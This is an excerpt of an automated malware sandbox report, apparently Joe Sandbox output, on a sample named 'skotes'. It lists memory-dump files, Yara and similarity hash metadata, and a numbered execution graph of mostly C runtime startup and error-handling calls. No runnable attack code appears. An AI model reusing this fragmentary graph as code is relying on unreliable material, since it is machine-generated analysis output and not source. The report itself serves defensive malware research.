                                                                                                                                                                    • Associated: 00000006.00000002.3381846199.0000000000802000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381939760.0000000000803000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382119598.000000000080E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382240516.000000000080F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382319889.0000000000810000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382394515.0000000000812000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382482520.000000000082C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382540800.000000000082E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382621872.000000000082F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382687096.0000000000830000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382752221.0000000000837000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382815338.0000000000841000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382910219.000000000085E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382949661.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383013206.0000000000860000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383157139.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383316521.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383390501.000000000086C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383468207.0000000000879000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383505709.000000000087B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383557411.000000000087C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383623379.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383677747.0000000000888000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383715340.0000000000890000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383770746.0000000000897000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383832437.0000000000899000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383974699.00000000008C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384129731.0000000000901000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384176428.0000000000903000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384197388.0000000000904000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384236784.0000000000909000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384276090.000000000090B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384317353.0000000000918000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384354809.0000000000919000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_6_2_610000_skotes.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Concurrency::details::FreeIdleProxyProxy::ReturnThreadstd::invalid_argument::invalid_argument
                                                                                                                                                                    • String ID: pContext
                                                                                                                                                                    • API String ID: 548886458-2046700901
                                                                                                                                                                    • Opcode ID: 62564ab3fcc85fc6138158550d4b088619526af728ef46ea41677a5a1ca7790e
                                                                                                                                                                    • Instruction ID: fa472e4a1ba71896d64ba5ab82027a497b14bb8d5d9007ee555d06641f370bb8
                                                                                                                                                                    • Opcode Fuzzy Hash: 62564ab3fcc85fc6138158550d4b088619526af728ef46ea41677a5a1ca7790e
                                                                                                                                                                    • Instruction Fuzzy Hash: 75E06839F0021467CB00B764E849C9EBB7F9FC1720704402AE611A3381EBB0EA01CAD8
                                                                                                                                                                    Function 006334CC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 006334FC
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000006.00000002.3380170791.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                    • Associated: 00000006.00000002.3380071723.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380170791.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380551481.0000000000679000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380639626.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380716683.0000000000685000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380817293.0000000000686000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380906503.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381354663.00000000007DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381469497.00000000007E0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381695825.0000000000800000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381778158.0000000000801000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381846199.0000000000802000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381939760.0000000000803000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382119598.000000000080E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382240516.000000000080F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382319889.0000000000810000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382394515.0000000000812000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382482520.000000000082C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382540800.000000000082E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382621872.000000000082F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382687096.0000000000830000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382752221.0000000000837000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382815338.0000000000841000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382910219.000000000085E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382949661.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383013206.0000000000860000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383157139.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383316521.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383390501.000000000086C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383468207.0000000000879000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383505709.000000000087B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383557411.000000000087C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383623379.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383677747.0000000000888000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383715340.0000000000890000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383770746.0000000000897000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383832437.0000000000899000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383974699.00000000008C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384129731.0000000000901000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384176428.0000000000903000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384197388.0000000000904000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384236784.0000000000909000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384276090.000000000090B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384317353.0000000000918000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384354809.0000000000919000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_6_2_610000_skotes.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: std::invalid_argument::invalid_argument
                                                                                                                                                                    • String ID: pScheduler$version
                                                                                                                                                                    • API String ID: 2141394445-3154422776
                                                                                                                                                                    • Opcode ID: 3393f9ae21ea2edc92e9213329ad5c6abd3c0eeeca0ee22a257219cdb880db47
                                                                                                                                                                    • Instruction ID: e773c5aa7cfdc2f1f78955c51148b1daffb4acbc5f82f06e5d12b97e441e7f33
                                                                                                                                                                    • Opcode Fuzzy Hash: 3393f9ae21ea2edc92e9213329ad5c6abd3c0eeeca0ee22a257219cdb880db47
                                                                                                                                                                    • Instruction Fuzzy Hash: D2E08C34840218B6CF66FB54D84BADC77EA9B11709F18C12AB811262939BB5978CDAC1

                                                                                                                                                                    Execution Graph

                                                                                                                                                                    Execution Coverage:4.3%
                                                                                                                                                                    Dynamic/Decrypted Code Coverage:0.6%
                                                                                                                                                                    Signature Coverage:0.9%
                                                                                                                                                                    Total number of Nodes:2000
                                                                                                                                                                    Total number of Limit Nodes:22
                                                                                                                                                                    execution_graph 13488 d957d0 13489 d957dc ___scrt_is_nonwritable_in_current_image 13488->13489 13515 d92baf 13489->13515 13491 d957e3 13492 d9593c 13491->13492 13500 d9580d ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock CallUnexpected 13491->13500 13551 d95020 IsProcessorFeaturePresent 13492->13551 13494 d95943 13495 d95949 13494->13495 13555 d98bd6 13494->13555 13558 d98bec 13495->13558 13499 d9582c 13500->13499 13501 d958ad 13500->13501 13503 d958a6 13500->13503 13533 d9b145 13501->13533 13526 d98c20 13503->13526 13505 d958b3 13537 db804b 13505->13537 13510 d958d8 13511 d958e1 13510->13511 13542 d98c02 13510->13542 13545 d92be8 13511->13545 13516 d92bb8 13515->13516 13561 d94c8c IsProcessorFeaturePresent 13516->13561 13520 d92bc9 13525 d92bcd 13520->13525 13571 d9867a 13520->13571 13523 d92be4 13523->13491 13525->13491 13527 d9cf0b ___scrt_is_nonwritable_in_current_image 13526->13527 13528 d98c36 std::_Lockit::_Lockit 13526->13528 13643 d9e783 GetLastError 13527->13643 13528->13501 13534 d9b14e 13533->13534 13536 d9b153 13533->13536 14016 d9b26e 13534->14016 13536->13505 14619 db8000 GetModuleHandleA GetModuleFileNameA ExitProcess 13537->14619 13540 d94fcd GetModuleHandleW 13541 d94fd9 13540->13541 13541->13494 13541->13510 14622 d98d21 13542->14622 13546 d92bf4 13545->13546 13547 d92c0a 13546->13547 14693 d9868c 13546->14693 13547->13499 13549 d92c02 13550 d96188 ___scrt_uninitialize_crt 7 API calls 13549->13550 13550->13547 13552 d95036 __fread_nolock CallUnexpected 13551->13552 13553 d950e1 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 13552->13553 13554 d95125 CallUnexpected 13553->13554 13554->13494 13556 d98d21 CallUnexpected 21 API calls 13555->13556 13557 d98be7 13556->13557 13557->13495 13559 d98d21 CallUnexpected 21 API calls 13558->13559 13560 d95951 13559->13560 13562 d92bc4 13561->13562 13563 d96169 13562->13563 13580 d9e1c6 13563->13580 13567 d9617a 13568 d96185 13567->13568 13594 d9e202 13567->13594 13568->13520 13570 d96172 13570->13520 13634 da0815 13571->13634 13574 d96188 13575 d9619b 13574->13575 13576 d96191 13574->13576 13575->13525 13577 d9d297 ___vcrt_uninitialize_ptd 6 API calls 13576->13577 13578 d96196 13577->13578 13579 d9e202 ___vcrt_uninitialize_locks DeleteCriticalSection 13578->13579 13579->13575 13581 d9e1cf 13580->13581 13583 d9e1f8 13581->13583 13585 d9616e 13581->13585 13598 da7e4b 13581->13598 13584 d9e202 ___vcrt_uninitialize_locks DeleteCriticalSection 13583->13584 13584->13585 13585->13570 13586 d9d264 13585->13586 13615 da7d5c 13586->13615 13591 d9d294 13591->13567 13593 d9d279 13593->13567 13595 d9e20d 13594->13595 13597 d9e22c 13594->13597 13596 d9e217 DeleteCriticalSection 13595->13596 13596->13596 13596->13597 13597->13570 13603 da7edd 13598->13603 13601 da7e83 InitializeCriticalSectionAndSpinCount 13602 da7e6e 13601->13602 13602->13581 13604 da7e65 13603->13604 13607 da7efe 13603->13607 13604->13601 13604->13602 13605 da7f66 GetProcAddress 13605->13604 13607->13604 13607->13605 13608 da7f57 13607->13608 13610 da7e92 LoadLibraryExW 13607->13610 13608->13605 13609 da7f5f FreeLibrary 13608->13609 13609->13605 13611 da7ed9 13610->13611 13612 da7ea9 GetLastError 13610->13612 13611->13607 13612->13611 13613 da7eb4 ___vcrt_FlsSetValue 13612->13613 13613->13611 13614 da7eca LoadLibraryExW 13613->13614 13614->13607 13616 da7edd ___vcrt_FlsSetValue 5 API calls 13615->13616 13617 da7d76 13616->13617 13618 da7d8f TlsAlloc 13617->13618 13619 d9d26e 13617->13619 13619->13593 13620 da7e0d 13619->13620 13621 da7edd ___vcrt_FlsSetValue 5 API calls 13620->13621 13622 da7e27 13621->13622 13623 da7e42 TlsSetValue 13622->13623 13624 d9d287 13622->13624 13623->13624 13624->13591 13625 d9d297 13624->13625 13626 d9d2a7 13625->13626 13627 d9d2a1 13625->13627 13626->13593 13629 da7d97 13627->13629 13630 da7edd ___vcrt_FlsSetValue 5 API calls 13629->13630 13631 da7db1 13630->13631 13632 da7dc9 TlsFree 13631->13632 13633 da7dbd 13631->13633 13632->13633 13633->13626 13635 da0825 13634->13635 13636 d92bd6 13634->13636 13635->13636 13638 d9ff89 13635->13638 13636->13523 13636->13574 13639 d9ff90 13638->13639 13640 d9ffd3 GetStdHandle 13639->13640 13641 da0035 13639->13641 13642 d9ffe6 GetFileType 13639->13642 13640->13639 13641->13635 13642->13639 13644 d9e799 13643->13644 13645 d9e79f 13643->13645 13681 d9f19b 13644->13681 13649 d9e7a3 SetLastError 13645->13649 13686 d9f1da 13645->13686 13653 d9e838 13649->13653 13654 d9cf1c 13649->13654 13657 d9b9c2 CallUnexpected 37 API calls 13653->13657 13670 d9b9c2 13654->13670 13655 d9e7e9 13659 d9f1da __dosmaperr 6 API calls 13655->13659 13656 d9e7d8 13658 d9f1da __dosmaperr 6 API calls 13656->13658 13660 d9e83d 13657->13660 13661 d9e7e6 13658->13661 13662 d9e7f5 13659->13662 13698 d9e4f7 13661->13698 13663 d9e7f9 13662->13663 13664 d9e810 13662->13664 13666 d9f1da __dosmaperr 6 API calls 13663->13666 13704 d9ea94 13664->13704 13666->13661 13669 d9e4f7 ___free_lconv_mon 14 API calls 13669->13649 13905 da08cc 13670->13905 13673 d9b9d2 13675 d9b9dc IsProcessorFeaturePresent 13673->13675 13676 d9b9fb 13673->13676 13677 d9b9e8 13675->13677 13678 d98bec CallUnexpected 21 API calls 13676->13678 13935 d9b4b9 13677->13935 13680 d9ba05 13678->13680 13709 d9f534 13681->13709 13683 d9f1b7 13684 d9f1d2 TlsGetValue 13683->13684 13685 d9f1c0 13683->13685 13685->13645 13687 d9f534 std::_Lockit::_Lockit 5 API calls 13686->13687 13688 d9f1f6 13687->13688 13689 d9e7bb 13688->13689 13690 d9f214 TlsSetValue 13688->13690 13689->13649 13691 d9f807 13689->13691 13696 d9f814 __dosmaperr 13691->13696 13692 d9f854 13726 d9ad6d 13692->13726 13693 d9f83f HeapAlloc 13694 d9e7d0 13693->13694 13693->13696 13694->13655 13694->13656 13696->13692 13696->13693 13723 d98f08 13696->13723 13699 d9e52c 13698->13699 13700 d9e502 HeapFree 13698->13700 13699->13649 13700->13699 13701 d9e517 GetLastError 13700->13701 13702 d9e524 __dosmaperr 13701->13702 13703 d9ad6d __strnicoll 12 API calls 13702->13703 13703->13699 13763 d9ebfa 13704->13763 13710 d9f564 13709->13710 13714 d9f560 std::_Lockit::_Lockit 13709->13714 13710->13714 13715 d9f469 13710->13715 13713 d9f57e GetProcAddress 13713->13714 13714->13683 13721 d9f47a ___vcrt_FlsSetValue 13715->13721 13716 d9f510 13716->13713 13716->13714 13717 d9f498 LoadLibraryExW 13718 d9f4b3 GetLastError 13717->13718 13719 d9f517 13717->13719 13718->13721 13719->13716 13720 d9f529 FreeLibrary 13719->13720 13720->13716 13721->13716 13721->13717 13722 d9f4e6 LoadLibraryExW 13721->13722 13722->13719 13722->13721 13729 d98f43 13723->13729 13740 d9e8d4 GetLastError 13726->13740 13728 d9ad72 13728->13694 13730 d98f4f ___scrt_is_nonwritable_in_current_image 13729->13730 13735 d9b750 EnterCriticalSection 13730->13735 13732 d98f5a CallUnexpected 13736 d98f91 13732->13736 13735->13732 13739 d9b767 LeaveCriticalSection 13736->13739 13738 d98f13 13738->13696 13739->13738 13741 d9e8ea 13740->13741 13742 d9e8f0 13740->13742 13744 d9f19b __dosmaperr 6 API calls 13741->13744 13743 d9f1da __dosmaperr 6 API calls 13742->13743 13746 d9e8f4 SetLastError 13742->13746 13745 d9e90c 13743->13745 13744->13742 13745->13746 13748 d9f807 __dosmaperr 12 API calls 13745->13748 13746->13728 13749 d9e921 13748->13749 13750 d9e929 13749->13750 13751 d9e93a 13749->13751 13752 d9f1da __dosmaperr 6 API calls 13750->13752 13753 d9f1da __dosmaperr 6 API calls 13751->13753 13761 d9e937 13752->13761 13754 d9e946 13753->13754 13755 d9e94a 13754->13755 13756 d9e961 13754->13756 13759 d9f1da __dosmaperr 6 API calls 13755->13759 13758 d9ea94 __dosmaperr 12 API calls 13756->13758 13757 d9e4f7 ___free_lconv_mon 12 API calls 13757->13746 13760 d9e96c 13758->13760 13759->13761 13762 d9e4f7 ___free_lconv_mon 12 API calls 13760->13762 13761->13757 13762->13746 13764 d9ec06 ___scrt_is_nonwritable_in_current_image 13763->13764 13777 d9b750 EnterCriticalSection 13764->13777 13766 d9ec10 13778 d9ec40 13766->13778 13769 d9ec4c 13770 d9ec58 ___scrt_is_nonwritable_in_current_image 13769->13770 13782 d9b750 EnterCriticalSection 13770->13782 13772 d9ec62 13783 d9ea49 13772->13783 13774 d9ec7a 13787 d9ec9a 13774->13787 13777->13766 13781 d9b767 LeaveCriticalSection 13778->13781 13780 d9eb02 13780->13769 13781->13780 13782->13772 13784 d9ea7f __Getctype 13783->13784 13785 d9ea58 __Getctype 13783->13785 13784->13774 13785->13784 13790 da1e7b 13785->13790 13904 d9b767 LeaveCriticalSection 13787->13904 13789 d9e81b 13789->13669 13791 da1efb 13790->13791 13794 da1e91 13790->13794 13792 da1f49 13791->13792 13795 d9e4f7 ___free_lconv_mon 14 API calls 13791->13795 13858 da2015 13792->13858 13794->13791 13796 da1ec4 13794->13796 13801 d9e4f7 ___free_lconv_mon 14 API calls 13794->13801 13797 da1f1d 13795->13797 13798 da1ee6 13796->13798 13806 d9e4f7 ___free_lconv_mon 14 API calls 13796->13806 13799 d9e4f7 ___free_lconv_mon 14 API calls 13797->13799 13800 d9e4f7 ___free_lconv_mon 14 API calls 13798->13800 13802 da1f30 13799->13802 13803 da1ef0 13800->13803 13805 da1eb9 13801->13805 13807 d9e4f7 ___free_lconv_mon 14 API calls 13802->13807 13808 d9e4f7 ___free_lconv_mon 14 API calls 13803->13808 13804 da1fb7 13809 d9e4f7 ___free_lconv_mon 14 API calls 13804->13809 13818 da12dd 13805->13818 13811 da1edb 13806->13811 13812 da1f3e 13807->13812 13808->13791 13813 da1fbd 13809->13813 13846 da15f8 13811->13846 13816 d9e4f7 ___free_lconv_mon 14 API calls 13812->13816 13813->13784 13814 da1f57 13814->13804 13817 d9e4f7 14 API calls ___free_lconv_mon 13814->13817 13816->13792 13817->13814 13819 da12ee 13818->13819 13845 da13d7 13818->13845 13820 da12ff 13819->13820 13821 d9e4f7 ___free_lconv_mon 14 API calls 13819->13821 13822 da1311 13820->13822 13823 d9e4f7 ___free_lconv_mon 14 API calls 13820->13823 13821->13820 13824 da1323 13822->13824 13825 d9e4f7 ___free_lconv_mon 14 API calls 13822->13825 13823->13822 13826 da1335 13824->13826 13828 d9e4f7 ___free_lconv_mon 14 API calls 13824->13828 13825->13824 13827 da1347 13826->13827 13829 d9e4f7 ___free_lconv_mon 14 API calls 13826->13829 13830 d9e4f7 ___free_lconv_mon 14 API calls 13827->13830 13832 da1359 13827->13832 13828->13826 13829->13827 13830->13832 13831 da136b 13832->13831 13833 d9e4f7 ___free_lconv_mon 14 API calls 13832->13833 13833->13831 13845->13796 13847 da1605 13846->13847 13857 da165d 13846->13857 13848 da1615 13847->13848 13849 d9e4f7 ___free_lconv_mon 14 API calls 13847->13849 13850 da1627 13848->13850 13852 d9e4f7 ___free_lconv_mon 14 API calls 13848->13852 13849->13848 13851 da1639 13850->13851 13853 d9e4f7 ___free_lconv_mon 14 API calls 13850->13853 13854 da164b 13851->13854 13855 d9e4f7 ___free_lconv_mon 14 API calls 13851->13855 13852->13850 13853->13851 13856 d9e4f7 ___free_lconv_mon 14 API calls 13854->13856 13854->13857 13855->13854 13856->13857 13857->13798 13859 da2022 13858->13859 13860 da2041 13858->13860 13859->13860 13864 da16dc 13859->13864 13860->13814 13863 d9e4f7 ___free_lconv_mon 14 API calls 13863->13860 13865 da17ba 13864->13865 13866 da16ed 13864->13866 13865->13863 13900 da1a3c 13866->13900 13869 da1a3c __Getctype 14 API calls 13870 da1700 13869->13870 13871 da1a3c __Getctype 14 API calls 13870->13871 13903 da1a4e 13900->13903 13901 da16f5 13901->13869 13902 d9e4f7 ___free_lconv_mon 14 API calls 13902->13903 13903->13901 13903->13902 13904->13789 13941 da0b4f 13905->13941 13908 da08f3 13910 da08ff ___scrt_is_nonwritable_in_current_image 13908->13910 13909 d9e8d4 __dosmaperr 14 API calls 13917 da0930 CallUnexpected 13909->13917 13910->13909 13911 da094f 13910->13911 13912 da0961 CallUnexpected 13910->13912 13910->13917 13913 d9ad6d __strnicoll 14 API calls 13911->13913 13914 da0997 CallUnexpected 13912->13914 13955 d9b750 EnterCriticalSection 13912->13955 13915 da0954 13913->13915 13920 da0ad1 13914->13920 13921 da09d4 13914->13921 13931 da0a02 13914->13931 13952 d9b458 13915->13952 13917->13911 13917->13912 13934 da0939 13917->13934 13923 da0adc 13920->13923 13960 d9b767 LeaveCriticalSection 13920->13960 13926 d9e783 _unexpected 39 API calls 13921->13926 13921->13931 13925 d98bec CallUnexpected 21 API calls 13923->13925 13927 da0ae4 13925->13927 13929 da09f7 13926->13929 13928 d9e783 _unexpected 39 API calls 13932 da0a57 13928->13932 13930 d9e783 _unexpected 39 API calls 13929->13930 13930->13931 13956 da0a7d 13931->13956 13933 d9e783 _unexpected 39 API calls 13932->13933 13932->13934 13933->13934 13934->13673 13936 d9b4d5 __fread_nolock CallUnexpected 13935->13936 13937 d9b501 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 13936->13937 13940 d9b5d2 CallUnexpected 13937->13940 13939 d9b5f0 13939->13676 14008 d929c6 13940->14008 13942 da0b5b ___scrt_is_nonwritable_in_current_image 13941->13942 13947 d9b750 EnterCriticalSection 13942->13947 13944 da0b69 13948 da0bab 13944->13948 13947->13944 13951 d9b767 LeaveCriticalSection 13948->13951 13950 d9b9c7 13950->13673 13950->13908 13951->13950 13961 d9b6a7 13952->13961 13954 d9b464 13954->13934 13955->13914 13957 da0a81 13956->13957 13959 da0a49 13956->13959 14007 d9b767 LeaveCriticalSection 13957->14007 13959->13928 13959->13932 13959->13934 13960->13923 13962 d9b6b9 _Fputc 13961->13962 13965 d9b601 13962->13965 13964 d9b6d1 _Fputc 13964->13954 13966 d9b618 13965->13966 13967 d9b611 13965->13967 13973 d9b626 13966->13973 13978 d9b67e 13966->13978 13974 d98af0 GetLastError 13967->13974 13970 d9b64d 13970->13973 13981 d9b485 IsProcessorFeaturePresent 13970->13981 13972 d9b67d 13973->13964 13975 d98b09 13974->13975 13985 d9e985 13975->13985 13979 d9b689 GetLastError SetLastError 13978->13979 13980 d9b6a2 13978->13980 13979->13970 13980->13970 13982 d9b491 13981->13982 13983 d9b4b9 CallUnexpected 8 API calls 13982->13983 13984 d9b4a6 GetCurrentProcess TerminateProcess 13983->13984 13984->13972 13986 d9e998 13985->13986 13987 d9e99e 13985->13987 13989 d9f19b __dosmaperr 6 API calls 13986->13989 13988 d9f1da __dosmaperr 6 API calls 13987->13988 14006 d98b25 SetLastError 13987->14006 13990 d9e9b8 13988->13990 13989->13987 13991 d9f807 __dosmaperr 14 API calls 13990->13991 13990->14006 13992 d9e9c8 13991->13992 13993 d9e9d0 13992->13993 13994 d9e9e5 13992->13994 13995 d9f1da __dosmaperr 6 API calls 13993->13995 13996 d9f1da __dosmaperr 6 API calls 13994->13996 13998 d9e9dc 13995->13998 13997 d9e9f1 13996->13997 13999 d9e9f5 13997->13999 14000 d9ea04 13997->14000 14003 d9e4f7 ___free_lconv_mon 14 API calls 13998->14003 14001 d9f1da __dosmaperr 6 API calls 13999->14001 14002 d9ea94 __dosmaperr 14 API calls 14000->14002 14001->13998 14004 d9ea0f 14002->14004 14003->14006 14005 d9e4f7 ___free_lconv_mon 14 API calls 14004->14005 14005->14006 14006->13966 14007->13959 14009 d929cf IsProcessorFeaturePresent 14008->14009 14010 d929ce 14008->14010 14012 d94b7e 14009->14012 14010->13939 14015 d94c64 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 14012->14015 14014 d94c61 14014->13939 14015->14014 14017 d9b28d 14016->14017 14018 d9b277 14016->14018 14017->13536 14018->14017 14022 d9b1af 14018->14022 14020 d9b284 14020->14017 14039 d9b37c 14020->14039 14023 d9b1b8 14022->14023 14024 d9b1bb 14022->14024 14023->14020 14048 da004c 14024->14048 14029 d9b1d8 14075 d9b29a 14029->14075 14030 d9b1cc 14031 d9e4f7 ___free_lconv_mon 14 API calls 14030->14031 14033 d9b1d2 14031->14033 14033->14020 14035 d9e4f7 ___free_lconv_mon 14 API calls 